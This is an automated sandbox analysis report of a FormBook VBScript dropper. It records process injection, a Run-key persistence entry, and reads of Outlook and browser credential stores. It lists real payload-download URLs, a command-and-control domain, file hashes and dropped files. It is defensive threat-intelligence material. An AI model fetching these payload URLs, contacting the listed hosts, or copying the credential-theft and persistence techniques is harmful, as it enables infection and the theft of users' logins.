      Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525253888.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574481518.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.549317340.00000000008B8000.00000004.00000020.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.715392182.0000000005120000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.758084456.0000000005120000.00000004.00000001.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp Binary or memory string: vProgram Manager
      Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
      Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
      Source: explorer.exe, 00000022.00000000.702018769.00000000005F7000.00000004.00000020.sdmp, explorer.exe, 00000022.00000000.753310066.00000000005F7000.00000004.00000020.sdmp Binary or memory string: ProgmanS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match; File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\cmstp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\cmstp.exe; File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
      Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match; File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Scripting 421 | Registry Run Keys / Startup Folder 1 | Process Injection 412 | Deobfuscate/Decode Files or Information 11 | OS Credential Dumping 1 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Scripting 421 | LSASS Memory | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Command and Scripting Interpreter 11 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 3 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | PowerShell 2 | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | Security Software Discovery 431 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 241 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 412 | Cached Domain Credentials | Virtualization/Sandbox Evasion 241 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

      Behavior Graph

      [Figure: behavior graph. Behavior Graph ID: 552589; Sample: MTIR22024323_0553381487_202...; Startdate: 13/01/2022; Architecture: WINDOWS; Score: 100]

      Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
      Sample-level DNS/IP: www.jewelrystore1.com

      Process tree shown in the graph:

      wscript.exe (started): VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
        powershell.exe (started): Tries to detect Any.run; Hides threads from debuggers
          ieinstal.exe (started): contacts www.wizumiya.co.jp 52.68.15.223, 443, 49775 AMAZON-02US United States; Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
            explorer.exe (injected)
              cmstp.exe (started): Detected FormBook malware; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures; dropped C:\Users\user\AppData\...\O11logrv.ini (data) and C:\Users\user\AppData\...\O11logri.ini (data)
                cmd.exe (started): Tries to harvest and steal browser information (history, passwords, etc); dropped C:\Users\user\AppData\Local\Temp\DB1 (SQLite)
                  conhost.exe (started)
                explorer.exe (started): 192.168.2.1 unknown unknown
                explorer.exe (started)
              ieinstal.exe (started)
              autochk.exe (started)
              ieinstal.exe (started)
          csc.exe (started): dropped C:\Users\user\AppData\Local\...\ej2xf2fu.dll (PE32)
            cvtres.exe (started)
          conhost.exe (started)
          2 other processes (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      MTIR22024323_0553381487_20220112120005.vbs | 12% | ReversingLabs | Script-WScript.Downloader.SLoad

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      18.2.ieinstal.exe.30f0000.0.unpack | 100% | Avira | HEUR/AGEN.1211214
      18.3.ieinstal.exe.3071dc0.0.unpack | 100% | Avira | HEUR/AGEN.1211214
      27.2.cmstp.exe.eb0000.0.unpack | 100% | Avira | HEUR/AGEN.1211214
      27.0.cmstp.exe.eb0000.0.unpack | 100% | Avira | HEUR/AGEN.1211214

      Domains

      Source | Detection | Scanner
      www.wizumiya.co.jp | 0% | Virustotal

      URLs

      Source | Detection | Scanner | Label
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
      https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at | 0% | Avira URL Cloud | safe
      www.jewelrystore1.com/wk3t/ | 0% | Avira URL Cloud | safe
      http://crl.microsoft | 0% | URL Reputation | safe
      https://contoso.com/ | 0% | URL Reputation | safe
      https://contoso.com/License | 0% | URL Reputation | safe
      https://contoso.com/Icon | 0% | URL Reputation | safe
      http://schemas.microsoft. | 0% | URL Reputation | safe
      http://fahrschule-heli.at/bin_WUOAiR166.bin | 0% | Avira URL Cloud | safe
      https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin | 0% | Avira URL Cloud | safe
      https://www.wizumiya.co.jp/html/user_da | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      www.jewelrystore1.com | 154.208.173.143 | true | true | | unknown
      www.wizumiya.co.jp | 52.68.15.223 | true | true | | unknown

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      www.jewelrystore1.com/wk3t/ | true | Avira URL Cloud: safe | low
      https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin | false | Avira URL Cloud: safe | unknown
      https://www.wizumiya.co.jp/html/user_da | true | Avira URL Cloud: safe | unknown

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.autoitscript.com/autoit3/J | explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp | false | | high
      http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | false | | high
      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
      https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at | ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
      http://crl.microsoft | powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp | false | | high
      https://contoso.com/ | powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
      https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | false | | high
      https://contoso.com/License | powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
      https://contoso.com/Icon | powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
      http://schemas.microsoft. | explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
      http://fahrschule-heli.at/bin_WUOAiR166.bin | ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g | cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmp | false | | high
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmp | false | | high
      https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp | false | | high

                      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      52.68.15.223 | www.wizumiya.co.jp | United States | 16509 | AMAZON-02US | true

      Private

      IP
      192.168.2.1

                      General Information

      Joe Sandbox Version: 34.0.0 Boulder Opal
      Analysis ID: 552589
      Start date: 13.01.2022
      Start time: 14:52:48
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 15m 18s
      Hypervisor based Inspection enabled: false
      Report type: full
      Sample file name: MTIR22024323_0553381487_20220112120005.vbs
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed: 44
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 1
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal100.troj.spyw.evad.winVBS@25/17@2/2
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 62.3% (good quality ratio 54.3%)
      • Quality average: 71.8%
      • Quality standard deviation: 33.4%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 69
      • Number of non-executed functions: 152
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .vbs
      • Override analysis time to 240s for JS/VBS files not yet terminated
      Warnings:
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 23.211.6.115
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtEnumerateKey calls found.
      • Report size getting too big, too many NtEnumerateValueKey calls found.
      • Report size getting too big, too many NtOpenFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

      Time | Type | Description
      14:54:20 | API Interceptor | 25x Sleep call for process: powershell.exe modified
      14:55:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV C:\Program Files (x86)\internet explorer\ieinstal.exe
      14:55:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV C:\Program Files (x86)\internet explorer\ieinstal.exe
      14:56:17 | API Interceptor | 522x Sleep call for process: explorer.exe modified

                      Joe Sandbox View / Context

                      IPs

      Match | Associated Sample Name / URL | Detection | Context
      52.68.15.223 | New Order Requirment.vbs | malicious | wizumiya.co.jp/html/user_data/original/ann/biggyy1.jpg
      52.68.15.223 | SHIPPING DOCUMENTS.vbs | malicious | wizumiya.co.jp/html/user_data/original/ann/oiks.txt

                      Domains

                      No context

                      ASN

      Match: AMAZON-02US

                      JA3 Fingerprints

      Match: 37f463bf4616ecd445d4a1937da06e19

                      Dropped Files

                      No context

                      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
      Process: C:\Windows\explorer.exe
      File Type: data
      Category: modified
      Size (bytes): 29232
      Entropy (8bit): 1.719605478566135
      Encrypted: false
      SSDEEP: 96:9OXt/xlovXPg9GGbEu4M9e7jePNx/HiGEYcgf:dvXc940T/V
      MD5: A50EED197FE2E44F38A1FBC67159EFAC
      SHA1: 5D176B29AB791D36E0A13F3AFF16C802C4AA135E
      SHA-256: 38E2E02DD39AD867C59D825214E161A205A05077BC9BC717996E056F7812FB21
      SHA-512: 617618FF90A63685E993399A9C825B3A8C6FF1361C7506E725654E12F0C8A712D3BF12F169A0E3E7CD705225BCC210AA87A79189A68AB6033E80DE1FB67F11B7
      Malicious: false

      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type: data
      Category: dropped
      Size (bytes): 5829
      Entropy (8bit): 4.8968676994158
      Encrypted: false
      SSDEEP: 96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
      MD5: 36DE9155D6C265A1DE62A448F3B5B66E
      SHA1: 02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
      SHA-256: 8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
      SHA-512: C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
      Malicious: false

      C:\Users\user\AppData\Local\Temp\DB1
      Process: C:\Windows\SysWOW64\cmd.exe
      File Type: SQLite 3.x database, last written using SQLite version 3032001
      Category: dropped
      Size (bytes): 40960
      Entropy (8bit): 0.792852251086831
      Encrypted: false
      SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
      MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
      SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
      SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
      SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
      Malicious: true
                      C:\Users\user\AppData\Local\Temp\FORSVARL.dat
                      Process:C:\Windows\System32\wscript.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):26711
                      Entropy (8bit):7.447343601702701
                      Encrypted:false
                      SSDEEP:768:ZVjtYl2Qumoov2LjPYPdU7MQIZInt28DNE8J:ZopugAjPYDWnTNv
                      MD5:501A97CEE8681B8E28324A9DCEFCCC69
                      SHA1:3B0EDC42D0E5C1E84E62C0018181BF01E9D5F433
                      SHA-256:B771C32B0F189855207BE56933EBCFB8142D18A20AA0F143B3E0DC3B545B6219
                      SHA-512:477322B3F7DEC25CD7EFAF2D252D899D3DA5437F0C74C389197B3AD23D7EFA0126D239CBC69B3C9F0E5CFD6084C7413FFA9D04C12499BFAB2D9F8CDFA915FB4A
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\RES5835.tmp
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                      Category:dropped
                      Size (bytes):1340
                      Entropy (8bit):3.9947234529934015
                      Encrypted:false
                      SSDEEP:24:HdK9oVaMYaHchKcjmfwI+ycuZhNW1NakSJ1CPNnq9ed:5IM9OK2mo1ulW1Na3J1Oq9+
                      MD5:D930D0FD1F5C0BA0AF7DF9E9D2E692D2
                      SHA1:0D922D7B63D83ED4F3C5B3BF9A95DD331BAEFF3A
                      SHA-256:B4ADC94FA9A02D91B0CB4F9D086BF0B0C6C88557A04996A3E0B0A53BBEFA3D05
                      SHA-512:E49951AC949875075F96CA48C220EC1F9FFEEC9C2F5281433D53877674BD54348AF2AB6D75432252F6E5D28C7CBA1213B220CA9104139D0C191B9AE661F95264
                      Malicious:false
                      Preview: L......a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP................8........l1rr.H..........7.......C:\Users\user\AppData\Local\Temp\RES5835.tmp.-.<...................'...Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.2.x.f.2.f.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ti3icgl.ztk.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v10kgrqs.2gg.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.1130536385099568
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry41Nak7YnqqJ1CPN5Dlq5J:+RI+ycuZhNW1NakSJ1CPNnqX
                      MD5:388794C6D483BB86F0D26C317272E848
                      SHA1:AAD2D00EAF92CF0FC921B271F3A3569B800AECA5
                      SHA-256:92DA20002E63D0CC8EBE6533AB4E5CBB7BC5DEAE37F857CF8526D18FB3966972
                      SHA-512:E7CA10207747EC4E1AD72867AA7D6FBDDDAE96D6353BDB750AEA7FCD1F4A8997EB28120740A939644460243B8628740C9A04E22E1C1F62739A084F2B3A023A57
                      Malicious:false
                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.2.x.f.2.f.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.j.2.x.f.2.f.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):673
                      Entropy (8bit):5.16161793724357
                      Encrypted:false
                      SSDEEP:12:V/DGrovLxlwOvdVtKMuiSLyLijCJVI8TFwQiP2m:JoovLxGOvDotLsWCHnTd+1
